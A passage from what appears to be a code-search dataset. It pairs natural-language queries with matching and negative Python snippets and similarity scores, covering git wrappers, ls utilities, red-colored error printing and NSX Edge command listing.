sorted(Path(root, x) for x in result)", "def git(*args):\n return subprocess.check_output([\"git\"] +\n list(args)).decode(\"utf-8\").strip().split(\"\\n\")", "def git(self, *args, **kwargs):\n retv = list()\n command = list()\n command.append(self.which('git'))\n # pylint: disable=W0106\n [command.append(x) for x in args]\n # pylint: enable=W0106\n\n cmd_args = {'stderr': subprocess.STDOUT, 'stdout': subprocess.PIPE}\n for kname, 
kvalue in kwargs.items():\n cmd_args[kname] = kvalue\n\n process = subprocess.Popen(command, **cmd_args)\n stdoutdata, stderrdata = process.communicate()\n if len(stdoutdata.strip()) > 0:\n for line in stdoutdata.split('\\n'):\n line = line.strip('\\n')\n log.debug(line)\n retv.append(line)\n returncode = process.returncode\n\n if returncode == 0:\n return retv\n\n raise GLToolsException(\"%s\\n\\n%s\" % (stderrdata, stdoutdata))", "def gitopen(args, git_tree=None):\n\n returncode = None\n output = None\n\n if git_tree is not None:\n cmd = [_git_path, \"--work-tree=%s\" % git_tree, \"--git-dir=%s\" % get_git_dir(git_tree)] + args\n else:\n cmd = [_git_path] + args\n\n env = os.environ.copy()\n env['LC_ALL'] = 'en_US'\n\n if _PLATFORM == \"windows\":\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n process = subprocess.Popen(\n cmd,\n startupinfo=startupinfo,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n stdin=subprocess.PIPE,\n shell=False,\n env=env\n )\n else:\n process = subprocess.Popen(\n cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n stdin=subprocess.PIPE,\n shell=False,\n env=env\n )\n output = process.communicate()\n returncode = process.returncode\n\n assert returncode == 0, \"Runtime Error: %s\" % output[0].rstrip()\n\n return output[0]", "def get_files_changed():\n files_list = []\n test = os.popen('git show --name-only')\n repo_location = os.popen('git rev-parse --show-toplevel')\n repo_location = repo_location.readlines()\n repo_location = repo_location[0]\n repo_location = repo_location.replace('\\n', '')\n if \"Not a git repository\" in repo_location:\n files_list.append(\"Not a git repository\")\n return files_list\n files_list.append(repo_location.split('/')[-1])\n output = test.readlines()\n for a in range(6, len(output)):\n files_list.append(output[a].replace('\\n', ''))\n return files_list", "def ls(commandList, rootDir, posixfinder):\n\n HIDDEN_FILES = False\n TIME_FILES = False\n USER_FILES = False\n SIZE_FILES = False\n TYPE_FILES = False\n HELP_REQUEST = False\n\n hidden = {'.idea', 'help.txt', 'INFO.txt', 'venv', '__pycache__', '__init__', '.git'}\n if len(commandList) == 1:\n # default ls configuration\n print('File names: ')\n for i in os.listdir():\n if i not in hidden:\n print(i)\n continue\n else:\n wrongList = []\n commandListFinal = []\n errorOption = None\n done = False\n # checks for options\n for option in commandList:\n if option == '-u':\n USER_FILES = True\n commandListFinal.append(option)\n elif option == '-t':\n TIME_FILES = True\n commandListFinal.append(option)\n elif option == '-h':\n HIDDEN_FILES = True\n commandListFinal.append(option)\n elif option == '-s':\n SIZE_FILES = True\n commandListFinal.append(option)\n elif option == '-c':\n TYPE_FILES = True\n commandListFinal.append(option)\n elif option == '-a':\n HIDDEN_FILES = True\n TIME_FILES = True\n USER_FILES = True\n SIZE_FILES = True\n TYPE_FILES = True\n commandListFinal.append(option)\n elif option == '--help':\n HELP_REQUEST = True\n commandListFinal.append(option)\n break\n elif option == 'ls':\n commandListFinal.append(option)\n continue\n else:\n errorOption = option\n commandListFinal.append(option)\n break\n if errorOption is not None and errorOption[0] != '-':\n try:\n os.listdir(errorOption.replace('*', rootDir))\n\n return confop(timeFiles=TIME_FILES, hiddenFiles=HIDDEN_FILES, userFiles=USER_FILES,\n sizeFiles=SIZE_FILES,\n typeFiles=TYPE_FILES, hiddenFilesA=hidden,\n customDir=errorOption, 
rootDir=rootDir, posixfinder=posixfinder)\n except OSError:\n return print(': '.join(commandListFinal) + ': not a directory or option for ls, '\n 'type ls --help for usage')\n\n if errorOption is not None and errorOption[0] == '-':\n for h in commandList:\n if h == errorOption:\n wrongList.append(h)\n return print(f\"{': '.join(wrongList)}: unexpected option, type ls --help for usage\")\n else:\n wrongList.append(h)\n continue\n if HELP_REQUEST:\n with open(f'{rootDir}/doc/lsdoc.txt' if posixfinder else f'{rootDir}\\\\doc\\\\lsdoc.txt') as f:\n return print(f.read())\n\n # Time last modified: | User of files: | Size of files: | Type: | Hidden: | File names:\n\n if not done:\n confop(timeFiles=TIME_FILES, hiddenFiles=HIDDEN_FILES, userFiles=USER_FILES, sizeFiles=SIZE_FILES,\n typeFiles=TYPE_FILES, hiddenFilesA=hidden,\n customDir=None, rootDir=rootDir, posixfinder=posixfinder)\n return None", "def ls():", "def main(self, *directories):\n if not self.git and len(directories) == 0:\n print (\"ERROR: At least one directory must be provided (or the \"\n \"--git-precommit flag must be passed.\\n\")\n self.help()\n return\n\n if len(directories) > 0:\n find = local['find']\n files = []\n for directory in directories:\n real = os.path.expanduser(directory)\n if not os.path.exists(real):\n raise ValueError(\"{0} does not exist\".format(directory))\n files.extend(find(real, '-not', '-name', '._*', '-name', '*.py').strip().split('\\n'))\n else:\n status = local['git']('status', '--porcelain', '-uno')\n root = local['git']('rev-parse', '--show-toplevel').strip()\n\n # get all modified or added python files\n modified = re.findall(r\"^\\s[AM]\\s+(\\S+\\.py)$\", status, re.MULTILINE)\n\n # now just get the path part, which all should be relative to the\n # root\n files = [os.path.join(root, line.split(' ', 1)[-1].strip())\n for line in modified]\n\n if len(files) > 0:\n print \"Linting {0} python files.\\n\".format(len(files))\n lint(files)\n else:\n print \"No python files found to lint.\\n\"", "def git_ls_tree(branch: str = 'main'):\n branch = quote(branch)\n return f\"git ls-tree -r {branch} --name-only\"", "def list_(ctx: click.Context, repository_path):\n root_commands.cmd_list(ctx.obj, repository_path)", "def cli_ls(parser):\n subparser = argparse.ArgumentParser(\n description='List files on a vault (default is drop.jarvice.com)',\n parents=[parser])\n\n subparser.add_argument('-store',\n default='drop.jarvice.com',\n help='Remote vault name')\n subparser.add_argument('-directory',\n default='.',\n help='Remote directory name')\n\n args = subparser.parse_args()\n result = utils.ls(config['username'], config['apikey'],\n args.store, args.directory)\n for i in result:\n print(i)", "def list_files(directories):\n return exec_fn(lambda: _list_dir(directories))", "def execute(self, *args):\n default_params = [\"git\", \"-C\", self.basePath]\n all_params = default_params + list(args)\n subprocess.call(all_params, stdout=open(self.logPath, 'a'), stderr=open(self.logPath, 'a'))", "def listfiles(self, *args, **kwargs):\n recursive = kwargs.get(\"recursive\", True)\n self._download_server_info()\n if self._info:\n return [a for a in self._info.keys() if _is_prefix(args, a)]\n text = self._open(*args).text\n parser = _FindLinksParser()\n parser.feed(text)\n links = parser.links\n files = [args + (f,) for f in links if not f.endswith(\"/\") and not f.endswith(\".info\")]\n if recursive:\n for f in links:\n if f.endswith(\"/\"):\n f = f.strip(\"/\")\n nargs = args + (f,)\n files.extend([a for a in 
self.listfiles(*nargs, recursive=True)])\n return files", "def main_list(args):\n return list_commands(args.directory)", "def checkGit(directory):", "def git_status(c):\n c.run(\"git submodule foreach git status\")", "def __gitSubmodulesList(self):\n self.vcs.gitSubmoduleList(self.project.getProjectPath())", "def git(ctx, commands):\n\n # create local copies of ctx vaiables for easy access\n gitCommand = ctx.obj[\"gitCommand\"]\n\n system(gitCommand + \" \".join(commands))", "def ls(path, filter=None):" ]
[ "0.7529486", "0.6684709", "0.66222614", "0.6546617", "0.63417643", "0.63115054", "0.62302166", "0.61532456", "0.61515826", "0.60766083", "0.60619664", "0.60407776", "0.6007652", "0.5975857", "0.59522355", "0.58336353", "0.5823643", "0.5823149", "0.58227754", "0.5755018", "0.5753638", "0.5730833", "0.5722453", "0.5645064", "0.5622107", "0.5560811", "0.5533176", "0.5507636", "0.54927814", "0.54850554" ]
0.7539438
0
Print a message indicating failure in red color to STDERR.
def print_failure_message(message): try: import colorama print(colorama.Fore.RED + message + colorama.Fore.RESET, file=sys.stderr) except ImportError: print(message, file=sys.stderr)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def err(msg):\n print(colored.red(\"[ERROR]: {0}\".format(msg)))", "def print_error(message: str):\n print_with_color(message, constant.Color.FAIL)", "def print_failure_msg(msg):\n click.secho(msg, fg='red', file=sys.stderr)", "def failure(self, message=''):\n print(colored(message, 'red'))", "def print_error(message):\n from sys import stderr\n print(\"\\033[1;31;40m \" + message + \"\\033[0;37;40m\", file=stderr)", "def error(message='Ops, there are some error...'):\n print(colorful_text(message, Fore.RED))", "def print_failure(text):\n\n print(colorize(text, Colors.FAIL))", "def msg_err(message):\n to_stdout(\" !!! {message}\".format(message=message), colorf=red, bold=True)\n if _logger:\n _logger.error(message)", "def print_failure(msg):\n\n tf.print(BColors.FAIL + msg + BColors.ENDC, output_stream=sys.stderr)\n sys.exit(1)", "def error_message(message='Ops, there are some error...'):\n print(colorful_text(message, Fore.RED))", "def fail():\n sys.stdout.write('%s[ fail ]%s\\n' % (colors.RED, colors.RESET))", "def color_print(message, color, newline='\\n'):\n sys.stderr.write('%s%s%s%s' % (color, message, ANSI_NORMAL, newline))", "def error(message):\n if DEBUG:\n with print_lock:\n print((Colours.FAIL + 'ERROR: ' + Colours.END_COLOUR + message).strip())", "def error(msg):\n sys.stdout.write('%s[ ERROR ]%s %s\\n' % (colors.RED, colors.RESET, msg))", "def error(message):\n global LAST_LOG\n LAST_LOG = message\n cprint('\\r[ERR] {0}'.format(message), 'red', file=sys.stderr)", "def print_err(*vargs, **kwargs):\n _do_print_color(*vargs, colorcode = 31, **kwargs)", "def error(msg, *args):\n if args:\n msg %= args\n click.echo(click.style(msg, fg='red', bold=True), file=sys.stderr)", "def error(msg):\n click.secho(f'[ERROR] {msg}', fg='red')", "def command_failed_error(cmd):\n\n output_1 = colored(' - Error: Failed to run command ', 'red')\n output_2 = command(cmd)\n return output_1 + output_2 + '\\n'", "def printerr(msg):\n print(msg, file=sys.stderr)", "def print_err(msg):\n print(msg, file=sys.stderr)", "def error(name=None, msg=None, lineno=None):\n if name is not None:\n if error_color:\n print(\"\\033[31;1;4mError:\\033[0m %s\" % name, file=sys.stderr)\n else:\n print(\"Error: %s\" % name, file=sys.stderr)\n if msg is not None:\n print(msg, file=sys.stderr)\n if lineno is not None:\n if error_color:\n print(\"\\033[32;1;4mLine Number:\\033[0m %d\" % int(lineno),\n file=sys.stderr)\n\n else:\n print(\"Line Number: %d\" % int(lineno),\n file=sys.stderr)\n sys.exit(1)", "def printerr(message):\n sys.stderr.write('{}\\n'.format(message))\n sys.stderr.flush()", "def error(message):\n print(message, file=sys.stderr)", "def error(message, exits=None): # pylint: disable=unused-argument\n print(crayons.red(fmt(message, \"[✗]\"), bold=True))\n sys.stdout.flush()", "def style_error(msg='{}'):\n red_code = '\\033[0;31m'\n return text_color(msg, red_code)", "def errprint(msg):\n\n print('!! *** ERROR: %s' % msg)", "def print_error(*args):\n print_message_with_title('ERROR', *args, c1='r', c2=None, style='b')", "def _print_error(message):\n sys.stderr.write(str(message) + \"\\n\")\n sys.stderr.flush()", "def eprint(errmsg):\n print(errmsg, file=STDERR)" ]
[ "0.8139798", "0.7891391", "0.7861315", "0.7850614", "0.7619812", "0.7606152", "0.760484", "0.75479156", "0.75395614", "0.74183655", "0.7407587", "0.73441464", "0.72732544", "0.72718126", "0.7205987", "0.71278733", "0.71020126", "0.706107", "0.7059658", "0.696329", "0.6958461", "0.6946168", "0.6945375", "0.694178", "0.6878918", "0.68595564", "0.68553483", "0.67925197", "0.6777555", "0.6766789" ]
0.8332692
0
Returns the Kernel version, Build number, Name and Version information for a given NSX edge: NSXEdge>show version
def get_os_info(cls, client_object, **kwargs): endpoint = "show version " PARSER = "raw/showEdgeVersion" EXPECT_PROMPT = ['bytes*', 'NSXEdge>'] # Get the parsed data mapped_pydict = utilities.get_mapped_pydict_for_expect( client_object.connection, endpoint, PARSER, EXPECT_PROMPT, ' ') # Close the expect connection object client_object.connection.close() get_edge_version_schema_object = show_edge_version_schema. \ ShowEdgeVersionSchema(mapped_pydict) pylogger.info("show version command output : %s" % get_edge_version_schema_object.__dict__) return get_edge_version_schema_object
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_version(self):\n verxml = self._ncc.nxoscli('show version')\n self.logger.debug(verxml)\n verparsed = _begin_parse(verxml)\n sysmgrclischema = parse_get_nsmap(verparsed)\n self.logger.debug(\"NSMAP: {}\".format(sysmgrclischema))\n showversion = find_element(['sys_ver_str', 'chassis_id', 'host_name', 'loader_ver_str'], sysmgrclischema,\n verparsed)\n self.logger.debug(str(showversion))\n self.hostname = showversion['host_name']\n self.chassis_id = showversion['chassis_id']\n self.system_version = showversion['sys_ver_str']", "def version(self):\n done, data = self._request('GV')\n if done:\n return {\n 'firmware': data[0],\n 'protocol': data[1]\n }\n\n raise EvseError", "def build_version(self):\n return self.nodes[0].get('infos').get('system_info').get('system_version')", "def show_versions():\n sys_info = _get_sys_info()\n deps_info = _get_deps_info()\n\n print(\"\\nSystem:\")\n for k, stat in sys_info.items():\n print(\"{k:>10}: {stat}\".format(k=k, stat=stat))\n\n print(\"\\nPython dependencies:\")\n for k, stat in deps_info.items():\n print(\"{k:>13}: {stat}\".format(k=k, stat=stat))", "def show_version():\n print(\"===============================================================\")\n print(f\"Productivity App v{__VERSION__}\")\n print(f\"Made by {__AUTHOR__} (with the advices of {__ADVISOR__})\")\n print(\"Source : https://github.com/Ilade-s/productivite-app-TkVer\")\n print(\"Server (optionnal) : https://github.com/Tifiloow/productivite-app\")\n print(\"Assets : https://feathericons.com/\")\n print(\"===============================================================\")", "def get_version(ip):\n url='http://{}/ins'.format(ip)\n\n myheaders={'content-type':'application/json'}\n payload={\n \"ins_api\": {\n \"version\": \"1.0\",\n \"type\": \"cli_show\",\n \"chunk\": \"0\",\n \"sid\": \"1\",\n \"input\": \"show version\",\n \"output_format\": \"json\"\n }\n }\n response = requests.post(url,data=json.dumps(payload), headers=myheaders,auth=(nxos_username,nxos_password))\n resp = response.json()['ins_api']['outputs']['output']['body']['kickstart_ver_str']\n return resp", "def read_versionInfo(self):\n # PROTECTED REGION ID(SdpMasterLeafNode.versionInfo_read) ENABLED START #\n return self.attr_map[\"versionInfo\"]\n # PROTECTED REGION END # // SdpMasterLeafNode.versionInfo_read", "def xnvme_ver(cml_path=None):\n\n if cml_path is None:\n cml_path = os.sep.join([\"..\", \"..\", \"CMakeLists.txt\"])\n\n with open(cml_path) as cmake:\n for line in cmake.readlines():\n if \"\\tVERSION \" not in line:\n continue\n\n _, vtxt = line.split(\"VERSION \", 1)\n\n return vtxt.strip()\n\n return \"\"", "def show_version():\n terminal.echo(f\"{package_metadata['name']} {package_metadata['version']}\")", "def version(ctx):\n print(VERSION)", "def __getSuSEVersion(self):\n linuxVendor = \"SuSE\"\n linuxRelease, resultErr = self.ksp_ssh.ssh_execute_command(\n \"grep 'VERSION' /etc/SuSE-release | cut -d= -f2 | tr -d ' \\n'\")\n return linuxVendor.strip(), linuxRelease.strip()", "def driver_version(self):\n data = fcntl.ioctl(self._fd, _EVIOCGVERSION, '\\x00\\x00\\x00\\x00')\n return struct.unpack(\"i\", data)[0]", "def version():\n\n print(VERSION_CODE)", "def print_version(_args):\n print(__version__)", "def show_versions():\n sys_info = _get_sys_info()\n versions = _get_autogluon_versions()\n sorted_keys = sorted(versions.keys(), key=lambda x: x.lower())\n\n maxlen = 0 if len(versions) == 0 else max(len(x) for x in versions)\n print(\"\\nINSTALLED VERSIONS\")\n print(\"------------------\")\n for k, 
v in sys_info.items():\n print(f\"{k:<{maxlen}}: {v}\")\n print(\"\")\n for k in sorted_keys:\n print(f\"{k:<{maxlen}}: {versions[k]}\")", "def get_version_info(self):\n return self._jadeRpc('get_version_info')", "def do_version(self, a):\n print(\"\\tversion: \" + (str(ise.getVersion())) +\n \".\" + (str(ise.getFirmware())))", "def get_version_info():\n out = \"\\nmpsyt version : %s \" % __version__\n out += \"\\n notes : %s\" % __notes__\n out += \"\\npafy version : %s\" % pafy.__version__\n out += \"\\nPython version : %s\" % sys.version\n out += \"\\nProcessor : %s\" % platform.processor()\n out += \"\\nMachine type : %s\" % platform.machine()\n out += \"\\nArchitecture : %s, %s\" % platform.architecture()\n out += \"\\nPlatform : %s\" % platform.platform()\n out += \"\\nsys.stdout.enc : %s\" % sys.stdout.encoding\n out += \"\\ndefault enc : %s\" % sys.getdefaultencoding()\n out += \"\\nConfig dir : %s\" % get_config_dir()\n envs = \"TERM SHELL LANG LANGUAGE\".split()\n\n for env in envs:\n value = os.environ.get(env)\n out += \"\\nenv:%-11s: %s\" % (env, value) if value else \"\"\n\n return out", "def gather_metric(self):\n result = self._shell.run(self.FASTBOOT_COMMAND)\n # If '--version' flag isn't recognized, will print to stderr\n if result.stderr:\n version = self.FASTBOOT_ERROR_MESSAGE\n else:\n # The version is the last token on the first line\n version = result.stdout.splitlines()[0].split()[-1]\n\n response = {self.FASTBOOT_VERSION: version}\n return response", "def show_versions():\n\n print(\n f\"Version info: \"\n f\"autodoc_pydantic: {get_version('sphinxcontrib.autodoc_pydantic')} | \"\n f\"pydantic: {get_version_special('pydantic')} | \"\n f\"sphinx: {get_version('sphinx')} | \"\n f\"sphinx_rtd_theme: {get_version('sphinx_rtd_theme')} | \"\n f\"sphinx_tabs: {get_version('sphinx_tabs')}\")", "def GetVersion(*args, **kwargs):\n return _gdi_.RendererNative_GetVersion(*args, **kwargs)", "def cli_show_version(ctx, _, value):\n if not value or ctx.resilient_parsing:\n return\n\n show_versions()\n\n ctx.exit()", "def show_version(ctx, param, value):\n if not value or ctx.resilient_parsing:\n return\n click.echo('Zap AppImage utility')\n click.echo('version: {}'.format(__version__))\n ctx.exit()", "def get_ver(self, bootdefault):\n module = 'version/oper'\n method = 'GET'\n response = self.axapi_call(module, method)\n installedver = response.json()['version']['oper'][bootdefault]\n print(self.device + ' The version currently installed on ' + bootdefault + ' is: ' + installedver)", "def version():\n\tsys.stdout.write (\"NodeAutoInstall version %s\" % _VERSION)\n\tsys.stdout.write (\" (running on %s %s)\\n\" % (platform.system() , platform.machine()))", "def version(silent=False):\n if silent is False:\n print(\n \"- OS: \" + platform.system(),\n \"(\" + platform.architecture()[1] + \" \" + platform.architecture()[0] + \")\",\n \"\\n- Python: \" + platform.python_version(),\n \"\\n- NeuroKit2: \" + __version__,\n \"\\n\\n- NumPy: \" + np.__version__,\n \"\\n- Pandas: \" + pd.__version__,\n \"\\n- SciPy: \" + scipy.__version__,\n \"\\n- sklearn: \" + sklearn.__version__,\n \"\\n- matplotlib: \" + matplotlib.__version__,\n )\n else:\n return __version__", "def read_fw_version(self):\n\n # This function expects the firmware version to be in a line\n # prefixed with 'Product Extra'.\n # At the moment, it takes the form:\n # Product Extra : MCH FW V2.18.8 Final (r14042) (Mar 31 2017 - 11:29)\n # The following two parts will be extracted:\n # mch_fw_ver: V2.18.8 Final\n # mch_fw_date: 
Mar 31 2017 - 11:29\n # If NAT change the format, then this function will need to be updated\n\n pattern = \".*: MCH FW (.*) \\(.*\\) \\((.*)\\)\"\n\n for mch in range(1,3):\n try:\n result = self.mch_comms.call_ipmitool_command([\"fru\", \"print\", str(mch + MCH_FRU_ID_OFFSET)])\n\n for line in result.splitlines():\n if FW_TAG in line:\n match = re.match(pattern, line)\n if match:\n self.mch_fw_ver[mch] = match.group(1)\n self.mch_fw_date[mch] = match.group(2)\n else:\n self.mch_fw_ver[mch] = \"Unknown\"\n self.mch_fw_date[mch] = \"Unknown\"\n except CalledProcessError as e:\n self.mch_fw_ver[mch] = \"Unknown\"\n self.mch_fw_date[mch] = \"Unknown\"\n except TimeoutExpired as e:\n print(\"read_fw_version: caught TimeoutExpired exception: {}\".format(e))", "def version():\n click.echo(u'shellfoundry version ' + pkg_resources.get_distribution(u'shellfoundry').version)", "def get_dpdk_version(node):\n command = f\"cat {Constants.REMOTE_FW_DIR}/dpdk*/VERSION\"\n message = u\"Get DPDK version failed!\"\n stdout, _ = exec_cmd_no_error(node, command, message=message)\n # TODO: PAL should already tolerate stripped value in the log.\n logger.info(f\"DPDK Version: {stdout}\")\n return stdout.strip()", "def sys_info(self):\n\n for i in self._nodes.items():\n print(\"\\n==============================\")\n name = i[0]\n node = i[1]\n\n print(\"NODE: {}\\n\".format(name))\n\n # CPU\n print(\"CPU:\")\n self.cpu_info(node)\n\n # Grub\n print(\"\\nGrub Command Line:\")\n if \"grub\" in node:\n print(\" Current: {}\".format(node[\"grub\"][\"current_cmdline\"]))\n print(\" Configured: {}\".format(node[\"grub\"][\"default_cmdline\"]))\n\n # Huge Pages\n print(\"\\nHuge Pages:\")\n self.hugepage_info(node)\n\n # Devices\n print(\"\\nDevices:\")\n self.device_info(node)\n\n # Status\n print(\"\\nVPP Service Status:\")\n state, errors = VPPUtil.status(node)\n print(\" {}\".format(state))\n for e in errors:\n print(\" {}\".format(e))\n\n # Minimum system resources\n self.min_system_resources(node)\n\n print(\"\\n==============================\")" ]
[ "0.6694532", "0.61063725", "0.59893906", "0.58265644", "0.581532", "0.581229", "0.56937516", "0.56883925", "0.5680113", "0.56638014", "0.5618403", "0.5599922", "0.55912185", "0.55906004", "0.55780494", "0.5560827", "0.5550261", "0.5543873", "0.55412424", "0.5535596", "0.55161715", "0.55075586", "0.55007994", "0.5496112", "0.54885167", "0.54833627", "0.54733217", "0.5459852", "0.54469204", "0.54331285" ]
0.7000498
0
Logs in to the given NSX edge in configure terminal mode and fetches the list of all supported commands. Returns the list of commands as a Python set. Refer to /VDNetLib/TestData/Edge/list_command_configure_mode for the output format
def get_all_supported_commands_configure_mode(cls, client_object, **kwargs): pydict = dict() try: if "password" in kwargs: pwd = kwargs["password"] pylogger.info("trying to create an expect connection " "with %s" % pwd) else: pwd = constants.VSMterms.PASSWORD # Execute the command on the Edge VM expect_condition, command_output = client_object.connection.\ execute_command_in_configure_terminal("list", ['#'], enable_password=pwd) except: # Close the expect connection object client_object.connection.close() pydict['result'] = False return pydict # Close the expect connection object client_object.connection.close() error_occured = command_output.find('Error') if expect_condition == 0: # expecting the '#' prompt if error_occured == -1: pylogger.info("Successfully listing configure mode commands") lines = command_output.split("\n") lines = [i.strip() for i in lines] if "NSXEdge(config)" in lines: lines.remove("NSXEdge(config)") pydict['supported_commands'] = set(lines) return pydict else: raise RuntimeError("Unable to list config mode commands") else: raise RuntimeError("Unable to establish expect connection")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_all_supported_commands_enable_mode(\n cls, client_object, **kwargs):\n pydict = dict()\n\n try:\n if \"password\" in kwargs:\n password = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % password)\n\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_enable_terminal(\"list\", ['#'],\n password=password)\n\n else:\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_enable_terminal(\"list\", ['#'])\n\n except:\n # Close the expect connection object\n client_object.connection.close()\n\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n # Fetching the Error string if any\n error_occured = command_output.find('Error')\n\n if expect_condition == 0: # expecting the '#' prompt\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing enable mode commands\")\n lines = command_output.strip().split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge\" in lines:\n lines.remove(\"NSXEdge\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list enable mode commands\")\n else:\n pydict['result'] = False\n return pydict", "def get_all_supported_commands_admin_mode(\n cls, client_object, **kwargs):\n pydict = dict()\n EXPECT_PROMPT = ['bytes*', 'NSXEdge>']\n\n try:\n if \"password\" in kwargs:\n password = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % password)\n\n client_object.password = password\n\n # Execute the command on the Edge VM\n command_output = client_object.connection.\\\n request(\"list\", EXPECT_PROMPT).response_data\n\n else:\n # Execute the command on the Edge VM\n command_output = client_object.connection.\\\n request(\"list\", EXPECT_PROMPT).response_data\n\n except:\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n # Fetching the Error string if any\n error_occured = command_output.find('Error')\n\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing admin mode commands\")\n lines = command_output.strip().split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge\" in lines:\n lines.remove(\"NSXEdge\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list admin mode commands\")", "def list_commands(self) -> dict[str, str] | None:\n try:\n return cast(dict[str, str], self._client.list_commands(self._alias))\n except PyNUTError as err:\n _LOGGER.error(\"Error retrieving supported commands %s\", err)\n return None", "def list_commands(self):\n response = self.do_command('list_commands')\n stripped = [s for s in (t.strip() for t in response.split(\"\\n\"))]\n return [s for s in stripped if is_well_formed_gtp_word(s)]", "def getCommandList(self):\n return self.commands.keys()", "def getCommands(self):", "def get_commands_list() -> list:\n return open(\"data/metadata/commands.list.txt\", \"r\").read().split(\"\\n\")", "def get_commands(self):\n return list(self.commands.values())", "def list_commands(self, ctx):\n return self.daemon.list_actions()", "def setup_commands(self):\n return self.get_data(\"setup_commands\")", "def _get_commands(self) -> list:\n return [i[1] for i in inspect.getmembers(self, predicate=lambda i: hasattr(i, \"is_cmd\"))]", "def 
list_commands(self, ctx):\n commands = self._iter_commands()\n return commands.keys()", "def commands(self) -> List[Command]:\n return []", "def do_list_commands(self):\n result = \"\\n\".join(self.commands.keys())\n return result, True", "def commands(self) -> typing.List[str]:\n return self._values.get(\"commands\")", "def list_commands(self, context):\n\t\treturn self.commands.keys()", "def get_commands(self):\n\t\treturn list(self.command_handlers.keys())", "def get_commands(self):\r\n return list(filter(None, self._commands.keys()))", "def list_commands(self, ctx): # noqa\n return self.commands.keys()", "def get_commands(self):\r\n return self._commands", "def list_command(ctx: Any) -> None:\n pass", "def get_all_commands():\n\n session_attributes = {}\n card_title = \"All Commands\"\n speech_output = \"You can ask for a synonym, antonym, rhyme, definition, part of speech, syllables, or frequency of a word by saying something like 'synonym for happy'. You can also ask for a random synonym, antonym, definition, or rhyme by saying something like 'random synonym for happy'. If you want all of them, say something like 'all synonyms for happy.'\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Ask for a synonym, antonym, part of speech, rhyme, definition, syllables, or frequency of a word! Or say 'all commands' to get hear all commands.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(card_title, speech_output, reprompt_text, should_end_session))", "def cmd(self) -> List[str]:\n raise NotImplementedError(\"Must implement in frontend subclass.\")", "def set_command_list(self):\n self.commands = dict( \\\n BTN_POWER_OFF = 2, \\\n BTN_TV = 27, \\\n BTN_1 = 4, \\\n BTN_2 = 5, \\\n BTN_3 = 6, \\\n BTN_4 = 8, \\\n BTN_5 = 9, \\\n BTN_6 = 10, \\\n BTN_7 = 12, \\\n BTN_8 = 13, \\\n BTN_9 = 14, \\\n BTN_0 = 17, \\\n BTN_FAVOURITE_CHANNEL = 68, \\\n BTN_PREVIOUS_CHANNEL = 19, \\\n BTN_VOLUME_UP = 7, \\\n BTN_VOLUME_DOWN = 11, \\\n BTN_CHANNEL_UP = 18, \\\n BTN_CHANNEL_DOWN = 16, \\\n BTN_MUTE = 15, \\\n BTN_SOURCE = 1, \\\n BTN_INFO = 31, \\\n BTN_TOOLS = 75, \\\n BTN_GUIDE = 79, \\\n BTN_RETURN = 88, \\\n BTN_MENU = 26, \\\n BTN_ENTER = 104, \\\n BTN_UP = 96, \\\n BTN_DOWN = 97, \\\n BTN_LEFT = 101, \\\n BTN_RIGHT = 98, \\\n BTN_INTERNET = 147, \\\n BTN_EXIT = 45, \\\n BTN_RED = 108, \\\n BTN_GREEN = 20, \\\n BTN_YELLOW = 21, \\\n BTN_BLUE = 22, \\\n BTN_TELETEXT = 44, \\\n BTN_MEDIA = 140, \\\n BTN_CONTENT = 121, \\\n BTN_CHANNEL_LIST = 107, \\\n BTN_AD = 0, \\\n BTN_SUBTITLE = 37, \\\n BTN_FORWARD = 69, \\\n BTN_PAUSE = 74, \\\n BTN_BACKWARD = 72, \\\n BTN_RECORD = 73, \\\n BTN_PLAY = 71, \\\n BTN_STOP = 70, \\\n BTN_SLEEP = 3, \\\n BTN_PICTURE_IN_PICTURE = 32, \\\n BTN_PSIZE = 62, \\\n BTN_ENERGY = 119, \\\n BTN_SRS = 110, \\\n BTN_PMODE = 40, \\\n BTN_P_DYNAMIC = 189, \\\n BTN_P_STANDARD = 223, \\\n BTN_P_MOVIE1 = 222, \\\n BTN_P_MOVIE2 = 221, \\\n BTN_P_USER1 = 220, \\\n BTN_P_USER2 = 219, \\\n BTN_P_USER3 = 218, \\\n BTN_ASPECT_43 = 227, \\\n BTN_ASPECT_169 = 228, \\\n BTN_S_SCART1 = 132, \\\n BTN_S_SCART2 = 235, \\\n BTN_S_MODULE = 134, \\\n BTN_S_AV = 236, \\\n BTN_S_VGA = 105, \\\n BTN_S_HDMI1 = 233, \\\n BTN_S_HDMI2 = 190, \\\n BTN_S_HDMI3_DVI = 194, \\\n BTN_S_HDMI4 = 197)", "def getCommands(self):\r\n return [z for x, y, z in self._log if x == 'command']", "def list_commands(self, ctx: Context) -> List[str]:\n 
